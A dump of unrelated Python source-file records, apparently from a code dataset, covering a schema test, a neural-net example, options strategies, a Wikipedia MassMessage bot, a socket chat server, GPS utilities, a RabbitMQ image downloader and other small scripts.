make_test_result(swagger_20, definition)\n assert response_schema_conformance(response, results) is None\n\n\n@pytest.mark.parametrize(\n \"content, definition\",\n (\n (b'{\"random\": \"text\"}', {\"responses\": {\"200\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n (b'{\"random\": \"text\"}', {\"responses\": {\"default\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n ),\n)\ndef test_response_schema_conformance_invalid(swagger_20, content, definition):\n response = make_response(content)\n results = make_test_result(swagger_20, definition)\n with pytest.raises(AssertionError):\n response_schema_conformance(response, results)\n","sub_path":"test/runner/test_checks.py","file_name":"test_checks.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"628385255","text":"import numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.metrics import accuracy_score\nfrom nnclassifier import NNClassifier\n\n\n# This function splits the dataset into 3 sets (training set, cross-validation\n# set and test set), altough the third one is not actually used here\ndef splitdata(X, y):\n m = X.shape[0]\n b1 = int(m*0.6)\n b2 = int(m*0.8)\n return X[:b1, :], y[:b1], X[b1:b2, :], y[b1:b2], X[b2:, :], y[b2:]\n\n\n# Loading a file with data\ndata = loadmat('ex4data1.mat')\ndata_matrix = np.c_[data['X'], data['y']]\nnp.random.shuffle(data_matrix)\nX_ = data_matrix[:, :-1]\ny_ = np.array(data_matrix[:, -1], dtype=np.int)\n\nXtrain, ytrain, Xcv, ycv, Xtest, ytest = splitdata(X_, y_)\n\n# Creates a neural net with 25 units in the first hidden layer and 10 in the\n# second\nnn = NNClassifier(hidden_layer_sizes=[25, 10], penalty_const=1.5,\n learning_rate=2, max_iter=500)\n\n# See fit doc strings to learn how to use it.\nnn.fit(Xtrain, ytrain)\n\n# See predict doc strings to learn how to use it.\ny_pred = nn.predict(Xtrain)\nscore = accuracy_score(y_true=ytrain, y_pred=y_pred)\nprint('Accuracy (training): ', score)\n\ny_pred = nn.predict(Xcv)\nscore = accuracy_score(y_true=ycv, y_pred=y_pred)\nprint('Accuracy (cross-validation): ', score)\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"470941741","text":"from .option_query import *\nfrom abc import ABC\n\nclass OptionStrategy(ABC):\n \"\"\"\n This class represents a option spread object\n \"\"\"\n\n def __init__(self, name=None):\n self.name = name\n self.cols = ['symbol',\n 'expiration',\n 'quote_date',\n 'bid',\n 'ask',\n 'mark',\n 'delta',\n 'gamma',\n 'theta',\n 'vega',\n 'rho'\n ]\n\n\nclass Single(OptionStrategy):\n \"\"\"\n This class simulates a single option position. Either a call or put of an underlying asset\n \"\"\"\n\n def __init__(self, **params):\n super(Single, self).__init__('Single')\n self.option_type = params.pop('option_type', 'c')\n\n def __call__(self, data):\n # get spread params from user or set default if not given\n chains = OptionQuery(data).option_type(self.option_type).fetch()\n chains['mark'] = (chains['bid'] + chains['ask']) / 2\n chains = chains.set_index('quote_date', drop=False)\n\n return chains.loc[:, chains.columns.isin(self.cols)]\n\n\nclass Vertical(OptionStrategy):\n \"\"\"\n The vertical spread is an option spread strategy whereby the\n option trader purchases a certain number of options and simultaneously\n sell an equal number of options of the same class, same underlying security,\n same expiration date, but at a different strike price.\n \"\"\"\n\n def __init__(self, **params):\n super(Vertical, self).__init__('Vertical')\n\n # get spread params from user or set default if not given\n self.option_type = params.pop('option_type', 'c')\n self.width = params.pop('width', 2)\n\n if not self.width > 0:\n raise ValueError(\"Width cannot be less than 0\")\n\n def __call__(self, data):\n # here we get all the option chains based on option type\n chains = OptionQuery(data).option_type(self.option_type).fetch()\n\n # shift only the strikes since this is a vertical spread,\n # we create a join key (strike_key) to join on\n chains['strike_key'] = chains['strike'] + (self.width * self.option_type.value[1])\n left_keys = ['quote_date', 'expiration', 'option_type', 'strike_key']\n right_keys = ['quote_date', 'expiration', 'option_type', 'strike']\n\n # here we do a self join to the table itself joining by strike key, essentially we are\n # shifting the strikes to create the vertical spread\n chains = chains.merge(chains, left_on=left_keys, right_on=right_keys,\n suffixes=('', '_shifted'))\n\n # create the strategy symbol that represents this spread\n chains['symbol'] = chains['symbol'] + '-' + chains['symbol_shifted']\n\n # Calculate the spread's bid and ask prices and\n chains['bid'] = chains['bid'] - chains['ask_shifted']\n chains['ask'] = chains['ask'] - chains['bid_shifted']\n chains['mark'] = round((chains['bid'] + chains['ask']) / 2, 2)\n\n for greek in ['delta', 'theta', 'gamma', 'vega', 'rho']:\n if greek in chains.columns:\n chains[greek] = chains[greek] - chains[greek + \"_shifted\"]\n\n chains = chains.set_index('quote_date', drop=False)\n return chains.loc[:, chains.columns.isin(self.cols)]\n\n\nclass IronCondor(OptionStrategy):\n \"\"\"\n The iron condor is an option trading strategy utilizing two vertical spreads\n a put spread and a call spread with the same expiration and four different strikes.\n \"\"\"\n\n def __init__(self, option_type, width, c_width, p_width):\n super(IronCondor, self).__init__('Iron Condor')\n self.option_type = option_type\n self.width = width\n self.c_width = c_width\n self.p_width = p_width\n\n def __call__(self, data):\n\n if self.width <= 0 or self.c_width <= 0 or self.p_width <= 0:\n raise ValueError(\"Widths cannot be less than or equal 0\")\n\n\nclass CoveredStock(OptionStrategy):\n\n def __init__(self, data):\n super(CoveredStock, self).__init__(data)\n\n def __call__(self, data):\n pass\n\n\nclass Calender(OptionStrategy):\n\n def __init__(self, data, width):\n super(Calender, self).__init__(data)\n self.width = width\n\n def __call__(self, data):\n pass\n\n\nclass Butterfly(OptionStrategy):\n\n def __init__(self, data, width):\n super(Butterfly, self).__init__(data)\n self.width = width\n\n\nclass Diagonal(OptionStrategy):\n\n def __init__(self, data, width):\n super(Diagonal, self).__init__(data)\n self.width = width\n\n","sub_path":"optopsy/option_strategy.py","file_name":"option_strategy.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"373318690","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis script updates user groups MassMessage lists.\n\nThe following parameters are required:\n\n-config The page title that has the JSON config (object)\n\nThe following parameters are supported:\n\n-always Don't prompt to save changes.\n\n-end_date Logs will be parsed starting on this date. The default is\n yesterday. Format: YYYY-MM-DD.\n\n-meta metawiki will also be checked for group changes. Should be\n specified when running on WMF wikis with CentralAuth.\n\n-rename Rename logs will be parsed. If -meta from metawiki.\n\n-start_date Logs will be parsed ending on this date. The default is\n yesterday. Format: YYYY-MM-DD.\n\"\"\"\n# Author : JJMC89\n# License: MIT\nimport datetime\nimport json\nimport re\nfrom collections import OrderedDict\nfrom datetime import date, time, timedelta\nfrom itertools import chain\nfrom operator import itemgetter\n\nimport pywikibot\nfrom pywikibot.bot import ExistingPageBot, NoRedirectPageBot, SingleSiteBot\nfrom pywikibot.pagegenerators import PreloadingGenerator\n\n\ndef get_json_from_page(page):\n \"\"\"\n Return JSON from the page.\n\n @param page: Page to read\n @type page: L{pywikibot.Page}\n\n @rtype: dict or None\n \"\"\"\n if not page.exists():\n pywikibot.error('{} does not exist.'.format(page.title()))\n return None\n if page.isRedirectPage():\n pywikibot.error('{} is a redirect.'.format(page.title()))\n return None\n if page.isEmpty():\n pywikibot.log('{} is empty.'.format(page.title()))\n return None\n try:\n return json.loads(page.get().strip())\n except ValueError:\n pywikibot.error('{} does not contain valid JSON.'.format(page.title()))\n raise\n\n\ndef validate_config(config, site):\n \"\"\"\n Validate the configuration and return bool.\n\n @param config: configuration to validate\n @type config: dict\n @param site: site used in the validation\n @type site: L{pywikibot.Site}\n\n @rtype: bool\n \"\"\"\n pywikibot.log('config:')\n if not isinstance(config, dict):\n return False\n for title, page_config in config.items():\n pywikibot.log('-{} = {}'.format(title, page_config))\n page_config['page'] = pywikibot.Page(site, title)\n required_keys = ['enabled', 'group', 'page']\n has_keys = list()\n for key, value in page_config.items():\n if key in required_keys:\n has_keys.append(key)\n if key in ('add', 'enabled', 'remove', 'required'):\n if not isinstance(value, bool):\n return False\n elif key == 'group':\n if isinstance(value, str):\n page_config[key] = set([value])\n else:\n return False\n elif key == 'page':\n if value.content_model != 'MassMessageListContent':\n return False\n else:\n return False\n if sorted(has_keys) != sorted(required_keys):\n return False\n return True\n\n\ndef validate_options(options):\n \"\"\"\n Validate the options and return bool.\n\n @param options: options to validate\n @type options: dict\n\n @rtype: bool\n \"\"\"\n pywikibot.log('Options:')\n required_keys = ['config', 'end_date', 'start_date']\n has_keys = list()\n for key in ('end_date', 'start_date'):\n if key not in options:\n continue\n value = options[key]\n if isinstance(value, datetime.date):\n pass\n elif isinstance(value, str):\n try:\n value = datetime.datetime.strptime(value, '%Y-%m-%d').date()\n except ValueError:\n pywikibot.error('Date format must be YYYY-MM-DD.')\n return False\n else:\n return False\n options[key] = value\n for key, value in options.items():\n pywikibot.log('-{} = {}'.format(key, value))\n if key in required_keys:\n has_keys.append(key)\n if key == 'config':\n if not isinstance(value, str):\n return False\n elif key in 'end_date' 'start_date':\n if not isinstance(value, datetime.date):\n return False\n if sorted(has_keys) != sorted(required_keys):\n return False\n return True\n\n\nclass UserGroupsMassMessageListUpdater(\n SingleSiteBot, NoRedirectPageBot, ExistingPageBot\n):\n \"\"\"Bot to update MassMessage lists.\"\"\"\n\n def __init__(self, generator, **kwargs):\n \"\"\"\n Constructor.\n\n @param generator: the page generator that determines on which\n pages to work\n @type generator: generator\n \"\"\"\n self.availableOptions.update(\n {\n 'config': dict(),\n 'group_changes': list(),\n 'renames': [\n {'olduser': None, 'newuser': None, 'timestamp': None}\n ],\n }\n )\n self.generator = generator\n super().__init__(**kwargs)\n\n def check_disabled(self):\n \"\"\"Check if the task is disabled. If so, quit.\"\"\"\n if not self.site.logged_in():\n self.site.login()\n page = pywikibot.Page(\n self.site,\n 'User:{username}/shutoff/{class_name}.json'.format(\n username=self.site.user(), class_name=self.__class__.__name__\n ),\n )\n if page.exists():\n content = page.get(force=True).strip()\n if content:\n e = '{} disabled:\\n{}'.format(self.__class__.__name__, content)\n pywikibot.error(e)\n self.quit()\n\n def treat_page(self):\n \"\"\"Process one page.\"\"\"\n self.check_disabled()\n\n page_config = self.getOption('config')[self.current_page.title()]\n added_count = removed_count = renamed_count = 0\n page_json = json.loads(\n self.current_page.text, object_pairs_hook=OrderedDict\n )\n page_dict = {'>nonusers': set()}\n\n # Process the current targets.\n for item in page_json['targets']:\n page = pywikibot.Page(self.site, item['title'])\n if page.namespace().id not in (2, 3):\n page_dict['>nonusers'].add(page)\n continue\n base_page = pywikibot.Page(\n self.site, re.sub(r'^([^/]+).*', r'\\1', page.title())\n )\n if base_page.isTalkPage():\n user = pywikibot.User(base_page.toggleTalkPage())\n else:\n user = pywikibot.User(base_page)\n # Handle renames.\n for rename in self.getOption('renames'):\n if user != rename['olduser']:\n continue\n newuser = rename['newuser']\n newpage = pywikibot.Page(\n self.site,\n re.sub(\n r':{}\\b'.format(re.escape(user.title(with_ns=False))),\n ':{}'.format(newuser.title(with_ns=False)),\n page.title(),\n ),\n )\n pywikibot.log(\n '{} renamed to {} ({} to {})'.format(\n user.title(),\n newuser.title(),\n page.title(),\n newpage.title(),\n )\n )\n user = newuser\n page = newpage\n renamed_count += 1\n if page_config.get('required', None):\n if not page_config['group'] & set(user.groups()):\n pywikibot.log(\n 'Removed {}, not in required group'.format(\n user.title()\n )\n )\n removed_count += 1\n continue\n page_dict[user] = page\n\n # Handle group changes.\n for change in self.getOption('group_changes'):\n user = change['user']\n if (\n page_config.get('add', None)\n and (page_config['group'] & change['added'])\n and 'bot' not in user.groups()\n and user not in page_dict\n ):\n pywikibot.log('Added {}'.format(user.title()))\n page_dict[user] = user.toggleTalkPage()\n added_count += 1\n if page_config.get('remove', None) and (\n page_config['group'] & change['removed']\n ):\n if page_dict.pop(user, None):\n pywikibot.log('Removed {}'.format(user.title()))\n removed_count += 1\n\n # Build JSON and save.\n if added_count + removed_count + renamed_count > 0:\n new_pge_json = OrderedDict()\n new_pge_json['description'] = page_json['description']\n new_pge_json['targets'] = list()\n for page in sorted(\n page_dict.pop('>nonusers') | set(page_dict.values())\n ):\n new_pge_json['targets'].append({'title': page.title()})\n text = json.dumps(new_pge_json, ensure_ascii=False, indent=4)\n summary = 'Update MassMessage list: {} added, {} removed'.format(\n added_count, removed_count\n )\n if renamed_count > 0:\n summary += ', {} renamed'.format(renamed_count)\n self.put_current(text, summary=summary, minor=False)\n\n\ndef main(*args):\n \"\"\"\n Process command line arguments and invoke bot.\n\n @param args: command line arguments\n @type args: list of unicode\n \"\"\"\n options = {\n 'end_date': date.today() - timedelta(days=1),\n 'start_date': date.today() - timedelta(days=1),\n }\n # Process global arguments\n local_args = pywikibot.handle_args(args)\n site = pywikibot.Site()\n site.login()\n # Parse command line arguments\n for arg in local_args:\n arg, _, value = arg.partition(':')\n arg = arg[1:]\n if arg in ('config', 'end_date', 'start_date'):\n if not value:\n value = pywikibot.input(\n 'Please enter a value for {}'.format(arg), default=None\n )\n options[arg] = value\n else:\n options[arg] = True\n if not validate_options(options):\n pywikibot.bot.suggest_help(\n additional_text='The specified options are invalid.'\n )\n return False\n config = pywikibot.Page(site, options.pop('config'))\n config = get_json_from_page(config)\n if not validate_config(config, site):\n pywikibot.bot.suggest_help(\n additional_text='The specified configuration is invalid.'\n )\n return False\n options['config'] = config\n\n meta = pywikibot.Site('meta', 'meta')\n suffix = '@{}'.format(site.dbName())\n start = datetime.datetime.combine(options.pop('start_date'), time.min)\n end = datetime.datetime.combine(options.pop('end_date'), time.max)\n # Parse rename logs into a list of dict.\n if options.pop('rename', None):\n renames = list()\n if options.get('meta', None):\n rename_events = meta.logevents(\n logtype='gblrename', start=start, end=end, reverse=True\n )\n else:\n rename_events = site.logevents(\n logtype='renameuser', start=start, end=end, reverse=True\n )\n for rename in rename_events:\n try:\n renames.append(\n {\n 'olduser': pywikibot.User(\n site, rename.data['params']['olduser']\n ),\n 'newuser': pywikibot.User(\n site, rename.data['params']['newuser']\n ),\n 'timestamp': rename.timestamp(),\n }\n )\n except KeyError:\n continue\n options['renames'] = sorted(renames, key=itemgetter('timestamp'))\n\n # Parse rights logs into a list of dict.\n group_changes = list()\n rights_events = site.logevents(\n logtype='rights', start=start, end=end, reverse=True\n )\n if options.pop('meta', None):\n meta_rights_events = set()\n for log_event in meta.logevents(\n logtype='rights', start=start, end=end, reverse=True\n ):\n try:\n if log_event.page().title().endswith(suffix):\n meta_rights_events.add(log_event)\n except KeyError:\n continue\n rights_events = chain(rights_events, meta_rights_events)\n for log_event in rights_events:\n try:\n new_groups = set(log_event.newgroups)\n old_groups = set(log_event.oldgroups)\n group_changes.append(\n {\n 'user': pywikibot.User(\n site,\n re.sub(\n r'{}$'.format(suffix), '', log_event.page().title()\n ),\n ),\n 'added': new_groups - old_groups,\n 'removed': old_groups - new_groups,\n 'timestamp': log_event.timestamp(),\n }\n )\n except KeyError:\n continue\n options['group_changes'] = sorted(\n group_changes, key=itemgetter('timestamp')\n )\n\n # Generate pages and invoke the bot.\n gen = (\n config[key]['page'] for key in config.keys() if config[key]['enabled']\n )\n gen = PreloadingGenerator(gen)\n UserGroupsMassMessageListUpdater(gen, site=site, **options).run()\n return True\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"enwiki/massmessage_list_updater.py","file_name":"massmessage_list_updater.py","file_ext":"py","file_size_in_byte":13843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"573781410","text":"\"\"\"\nImplement an iterator to flatten a 2d vector.\n\nFor example,\nGiven 2d vector =\n\n[\n [1,2],\n [3],\n [4,5,6]\n]\nBy calling next repeatedly until hasNext returns false,\nthe order of elements returned by next should be: [1,2,3,4,5,6].\n\nHint:\n\nHow many variables do you need to keep track?\nTwo variables is all you need. Try with x and y.\nBeware of empty rows. It could be the first few rows.\nTo write correct code, think about the invariant to maintain. What is it?\nThe invariant is x and y must always point to a valid point in the 2d vector.\nShould you maintain your invariant ahead of time or right when you need it?\nNot sure? Think about how you would implement hasNext(). Which is more complex?\nCommon logic in two different places should be refactored into a common method.\n\n# Your Vector2D object will be instantiated and called as such:\n# i, v = Vector2D(vec2d), []\n# while i.hasNext(): v.append(i.next())\n\n\"\"\"\n\nimport collections\n\n\nclass Vector2D1(object):\n \"\"\"\n Solution using queue to store list of iterators, extra space\n \"\"\"\n def __init__(self, vec2d):\n \"\"\"\n Initialize your data structure here.\n :type vec2d: List[List[int]]\n \"\"\"\n self.listIt = collections.deque()\n for li in vec2d:\n if li and len(li) > 0:\n self.listIt.append([len(li), iter(li)])\n\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if self.listIt:\n self.listIt[0][0] -= 1\n return next(self.listIt[0][1])\n\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n while self.listIt and self.listIt[0][0] == 0:\n self.listIt.popleft()\n return len(self.listIt) > 0\n\n\nclass Vector2D(object):\n\n def __init__(self, vec2d):\n \"\"\"\n Initialize your data structure here.\n :type vec2d: List[List[int]]\n \"\"\"\n self.listIt = None if not vec2d else [len(vec2d), iter(vec2d)]\n self.numIt = None\n\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n self.numIt[0] -= 1\n return next(self.numIt[1])\n\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n if not self.listIt:\n return False\n while self.listIt[0] > 0 and (not self.numIt or self.numIt[0] == 0):\n self.listIt[0] -= 1\n nextList = next(self.listIt[1])\n if not nextList:\n continue\n self.numIt = [len(nextList), iter(nextList)]\n\n return self.numIt is not None and self.numIt[0] > 0\n","sub_path":"medium/Flatten2DVector.py","file_name":"Flatten2DVector.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"212530275","text":"from tkinter import *\nimport socket\nimport time\nimport threading\nimport fenetre as FEN\nfrom time import gmtime,strftime\n\n\n### patie varialbe \"global\"\nglobal combo\nglobal entree\n\nglobal sock\nglobal socketFils\n\n\nglobal Discution\nglobal currentConv\nglobal interface\n\n\ncurrentConv = []\nsocketFils = {}\ncurrentsocket = None\nDiscution = {}\ncurrentDiscution = \"\"\n\nfenetre = Tk()\n\nport = 15555\nexitFlag = True\nn = 0\n\n\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.bind(('', port ))\n\ndef callback():\n global socketFils\n \n if sock is not None:\n sock.close()\n #TODO close all client.\n for client in socketFils:\n if socketFils[client] != None:\n deco(socketFils[client], client, True)\n fenetre.destroy()\n\n\ndef deco(_sock, _name, _by_serv):\n global socketFils\n\n print (\"closing \" + format(_name))\n \n if _by_serv :\n envoie(\"serveur shutdown\", _sock)\n\n _sock.close()\n socketFils[_name]=None\n\ndef getting (_name): ##gert conv\n global Discution\n\n return Discution[_name]\n\ndef adding(_name, _sock): ## add conv \n global socketFils\n global Discution\n \n interface.add(_name) \n Discution[_name] = []\n socketFils[_name]=_sock\n\ndef subbing(_name):## sub conv\n global Discution\n del Discution[_name]\n\ndef addLigneConv(_name, txt):\n if currentDiscution == _name:\n interface.addaffiche(txt)\n Discution[_name].append(txt)\n\ndef onselect(evt):\n global currentDiscution\n global currentsocket\n global socketFils\n\n interface.clean() \n w = evt.widget \n index = int(w.curselection()[0])\n value = w.get(index)\n\n currentDiscution = value\n currentsocket = socketFils[value]\n\n print ('You selected item %d: \"%s\"' % (index, value))\n interface.affiche(getting(value))\n\ndef envoie(_inp, _sock):\n global currentsocket\n\n snd = (strftime(\"%H.%M.%S\", gmtime()) + \": \" + _inp)\n try:\n _sock.send(str.encode(snd))\n addLigneConv(_sock, snd)\n\n except:\n print(\"erreur, Connexion disparue (Erreur 1)\")\n\ndef envoyer():\n try:\n envoie(interface.saisi.get(), currentDiscution)\n interface.saisi.delete(0, END)\n except:\n pass\n\n### partie multithreading\n# # # thread qui comunique avec le client\nclass myThreadEcouteClient (threading.Thread):\n def __init__(self, _threadclient, _threadAdress, _nb):\n threading.Thread.__init__(self)\n self.threadclient = _threadclient\n self.threadAdress = _threadAdress\n self.nb = _nb\n print (\"{} connected\".format(self.threadAdress))\n adding(format(self.threadAdress), self.threadclient)\n \n\n def run(self):\n closeFlag = True\n\n while closeFlag:\n try:\n response = self.threadclient.recv(255)\n\n if response.decode()[10:] != \"\":\n if (response.decode())[10:] == \"connextion closed by client\":\n closeFlag = False\n deco(self.threadclient, self.threadAdress, False)\n else:\n print (response.decode())\n addLigneConv(format(self.threadAdress), response.decode())\n\n except Exception as inst :\n print(inst)\n print('erreur, connextion perdu (Erreur 2)')\n closeFlag = False\n deco(self.threadclient, self.threadAdress, False)\n\n print (format(self.threadAdress) + \" closed\")\n \n# # # thread qui boucle pour accepter les conection\nclass myThreadMainBoucleCO (threading.Thread): \n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global n\n global socketFils\n\n exitFlag = True\n while exitFlag:\n try:\n sock.listen(5)\n client, address = sock.accept()\n newthread = myThreadEcouteClient(client, address, n)\n newthread.start() \n except Exception as inst :\n print(inst)\n print('erreur, connextion perdu (Erreur 3)')\n exitFlag = False\n\n print (\"Close\")\n\n# Create new threads\nthread1 = myThreadMainBoucleCO()\n# Start new Threads\nthread1.start()\n\ntry:\n interface = FEN.Interface(fenetre)\n interface.liste.bind('<<ListboxSelect>>', onselect)\n interface.valider.configure(command=envoyer)\n interface.mainloop()\nexcept Exception as inst :\n print(inst)\n\ncallback()\nprint(\"this is the End folk\")","sub_path":"serveur.py","file_name":"serveur.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"525098117","text":"# defining a class\nclass Employee:\n no_of_leaves = 8\n\n # Constructor\n def __init__(self, obj_name, obj_salary, obj_age):\n self.name = obj_name\n self.salary = obj_salary\n self.age = obj_age\n\n # action method\n def print_details(self):\n return f'The name is: {self.name}\\nSalary: {self.salary}\\nAge is: {self.age}'\n\n # this class method can change class variables access by objects and instances\n @classmethod\n def change_leaves(cls, newleaves):\n cls.no_of_leaves = newleaves\n\n\n# Creating objects of employee class\nanindo = Employee('Anindo Dey', 50000, 25)\nharry = Employee('Harry Potter', 45000, 24)\n\nprint(\"Class variables:\", harry.no_of_leaves)\n\nharry.change_leaves(100)\nprint(\"Change after class variables:\", harry.no_of_leaves)","sub_path":"oops - class methods.py","file_name":"oops - class methods.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"7361299","text":"# -*- coding: utf-8 -*-\nfrom benchpress import util\nimport numpy as np\n\ndef main():\n B = util.Benchmark()\n\n k = B.size[0] # number of plane waves\n stripes = B.size[1] # number of stripes per wave\n N = B.size[2] # image size in pixels\n ite = B.size[3] # iterations\n\n phases = np.arange(0, 2*np.pi, 2*np.pi/ite)\n image = np.empty((N, N), dtype=B.dtype)\n d = np.arange(-N/2, N/2, dtype=B.dtype)\n\n xv, yv = np.meshgrid(d, d)\n theta = np.arctan2(yv, xv)\n r = np.log(np.sqrt(xv*xv + yv*yv))\n r[np.isinf(r) == True] = 0\n\n tcos = theta * np.cos(np.arange(0, np.pi, np.pi/k))[:, np.newaxis, np.newaxis]\n rsin = r * np.sin(np.arange(0, np.pi, np.pi/k))[:, np.newaxis, np.newaxis]\n inner = (tcos - rsin) * stripes\n\n cinner = np.cos(inner)\n sinner = np.sin(inner)\n\n B.start()\n\n for phase in phases:\n image[:] = np.sum(cinner * np.cos(phase) - sinner * np.sin(phase), axis=0) + k\n util.Benchmark().flush()\n\n B.stop()\n B.pprint()\n\n if B.outputfn:\n B.tofile(B.outputfn, {'res': image})\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchpress/benchmarks/quasicrystal/python_numpy/quasicrystal.py","file_name":"quasicrystal.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"488006219","text":"\"\"\"Defines classes used to read and handle GPS data\"\"\"\nimport math\nimport pynmea2\nimport serial\n\n\nEARTH_RADIUS = 6371001.0 # Average radius of spherical earth in meters\n\n\ndef get_location_offset(origin, north_offset, east_offset):\n \"\"\"\n Returns a GpsReading with calculated GPS latitude and longitude coordinates given a\n north and east offset in meters from original GPS coordinates. Note that\n an x offset corresponds to an east offset and a y offset corresponds to a north offset.\n For the new reading, the same altitude as the original GpsReading is kept and\n a null timestamp is used.\n\n Sources:\n https://github.com/dronekit/dronekit-python/blob/master/examples/mission_basic/mission_basic.py\n http://gis.stackexchange.com/questions/2951/algorithm-for-offsetting-a-latitude-longitude-by-some-amount-of-meters\n \"\"\"\n\n # Offsets coordinates in radians\n lat_offset = north_offset / EARTH_RADIUS\n lon_offset = east_offset / (EARTH_RADIUS*math.cos(math.pi*origin.latitude/180))\n\n # New position in decimal degrees\n new_lat = origin.latitude + (lat_offset * 180/math.pi)\n new_lon = origin.longitude + (lon_offset * 180/math.pi)\n return GpsReading(new_lat, new_lon, origin.altitude, 0)\n\n\ndef get_relative_from_location(origin, point):\n \"\"\"\n Returns the relative (x, y) values in meters of the GpsReading point based\n on the origin GpsReading (which is considered (0,0)). The inverse of\n get_location_offset.\n \"\"\"\n lon_offset = (point.longitude - origin.longitude) * (math.pi / 180)\n lat_offset = (point.latitude - origin.latitude) * (math.pi / 180)\n x = lon_offset * (EARTH_RADIUS*math.cos(math.pi*origin.latitude/180))\n y = lat_offset * EARTH_RADIUS\n return (x, y)\n\n\ndef get_distance(reading_1, reading_2):\n \"\"\"\n Returns distance in meters between two GpsReadings.\n The latitude is fairly accurate in this calculation\n but the longitude is off.\n\n Source:\n https://github.com/dronekit/dronekit-python/blob/master/examples/mission_basic/mission_basic.py\n \"\"\"\n lat_diff = reading_1.latitude - reading_2.latitude\n lon_diff = reading_1.longitude - reading_2.longitude\n return math.sqrt((lat_diff*lat_diff) + (lon_diff*lon_diff)) * 1.113195e5\n\n\nclass GpsReadError(Exception):\n \"\"\"Error for invalid gps reading\"\"\"\n def __init__(self, message, data):\n super(GpsReadError, self).__init__((message, data))\n\n\nclass GpsReading:\n \"\"\"A data class for GPS reading attributes\"\"\"\n def __init__(self, latitude, longitude, altitude, time):\n self.latitude = latitude\n self.longitude = longitude\n self.altitude = altitude\n self.time = time\n\n def __repr__(self):\n \"\"\"Returns representation of GPS reading\"\"\"\n return '{}({}, {}, {}, {})'.format(self.__class__.__name__,\n self.latitude, self.longitude,\n self.altitude, self.time)\n\n def __eq__(self, other):\n \"\"\"Compares if two GpsReadings are equal\"\"\"\n return (self.latitude == other.latitude and\n self.longitude == other.longitude and\n self.altitude == other.altitude and\n self.time == other.time)\n\n\nclass Gps:\n \"\"\"A class for gathering GPS data via serial\"\"\"\n def __init__(self, port, baudrate):\n self.ser = serial.Serial(port, baudrate, timeout=1)\n\n def __repr__(self):\n \"\"\"Returns representation of GPS\"\"\"\n return '{}({})'.format(self.__class__.__name__, self.ser)\n\n def read(self):\n \"\"\"Returns a GpsReading object with the values supplied\"\"\"\n msg = None\n max_tries = 4\n for attempt in range(1, max_tries + 1):\n try:\n while not isinstance(msg, pynmea2.GGA):\n msg = pynmea2.parse(self.ser.readline())\n except pynmea2.ParseError:\n if attempt == max_tries:\n raise GpsReadError('max number of parse attempts reached', attempt)\n else:\n pass\n else:\n break\n return GpsReading(msg.latitude, msg.longitude, msg.altitude,\n msg.timestamp)\n","sub_path":"control/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"408763827","text":"import pika\nimport hashlib\nfrom retry import retry\nimport requests\n\ncredentials = pika.PlainCredentials('guest1', 'guest1')\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n '192.168.10.190', 5672, '/', credentials))\n\nchannel = connection.channel()\nchannel.queue_declare(queue='img_url_test')\n\n\nclass Download_image:\n @retry(tries=3)\n def request_(self, img, md5_url):\n response = requests.get(img)\n if response.status_code is 200:\n with open('image/{0}.png'.format(md5_url), 'wb') as f:\n f.write(response.content)\n print('1')\n else:\n print('错误url:', img)\n\n def callback(self, ch, method, properties, body):\n img = body.decode()\n m1 = hashlib.md5()\n m1.update(img.encode('utf-8'))\n md5_url = m1.hexdigest()\n try:\n self.request_(img, md5_url)\n except Exception as e:\n print(e)\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n def consume_start(self):\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.callback,\n queue='img_url_test')\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n d = Download_image()\n d.consume_start()\n","sub_path":"hilder_other/community_image/download_image.py","file_name":"download_image.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"365969588","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'gdv'\nurlpatterns = [\n\t\turl(r'^$', views.index, name = 'index'),\n\t\turl(r'^main/', views.main, name = 'main'),\n\t\turl(r'^coordinates/', views.show_coordinates, name = 'coordinates'),\n\t\turl(r'^get_coords/', views.get_coordinates, name = 'get_coordinates'),\n\t]","sub_path":"mysite/gdv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"173058295","text":"#file read write\nf=open('fib.py','r')\nprint(f.read())\nf.close()\n#使用with自动调用\nwith open('fib.py','r') as f:\n 